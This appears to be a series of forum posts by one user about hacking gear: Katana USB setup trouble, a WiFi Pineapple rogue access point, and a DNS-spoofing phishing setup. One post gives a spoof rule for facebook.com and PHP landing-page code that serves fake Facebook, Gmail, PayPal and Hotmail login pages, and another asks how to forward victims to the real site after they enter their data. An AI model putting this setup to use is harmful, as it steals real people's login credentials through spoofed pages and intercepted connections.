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  1. After trying two Windows 7 machines I was finally able to get it to work in a Windows XP VM. :/
  2. Anyone else having issues with the bootinst? If I run it as admin it chooses my C: drive and I don't see an option to change that. I tried to edit the file so it would look for only the E: (my Katana USB drive) but it gives me the error "Error: can't find out current drive letter". If I just double click without running as admin it finds the correct drive without any issues... but fails since its not admin. :/
  3. Thanks! I'll give it a shot later on. Yea, if you want send me a PM. :D
  4. That worked! Thanks. Is it possible to redirect them to the "True" facebook page after they entered their data instead of going to a 503?
  5. I'm trying to redirect facebook.com. Only facebook. Thats not the case tho, every site I go to has /redirect.php at the end with the 503 error. Spoof *facebook.com [/CODE] Landing Page [CODE] <html> <head> <meta http-equiv="REFRESH" content="0;url=redirect.php"> </head> <?php $ref = $_SERVER['HTTP_HOST']; if (strpos($ref, 'facebook') !== FALSE) include("facebook.html"); elseif (strpos($ref, 'gmail') !== FALSE) include("gmail.htm"); elseif (strpos($ref, 'paypal') !== FALSE) include("paypal.htm"); elseif (strpos($ref, 'hotmail') !== FALSE) include("hotmail.htm"); require('error.php'); ?> <body> </body> </html> [/CODE] I'm learning PHP as I go so let me know if anything is screwed up.
  6. Went through the process and got it up and running with no trouble. But now when I plug in the pineapple(eth0) my internet connection (wlan0) takes a back seat, its still connected but no traffic is being sent. Has anyone had this issue? Another issue I'm having is none of my devices, Iphone and laptop, actually connect to the pineapple unless I specifically tell it to do so. Both devices are picking up my current SSID and the one I used previously. Shouldn't the Iphone probe for a connection and the pineapple agree to that SSID and connect?
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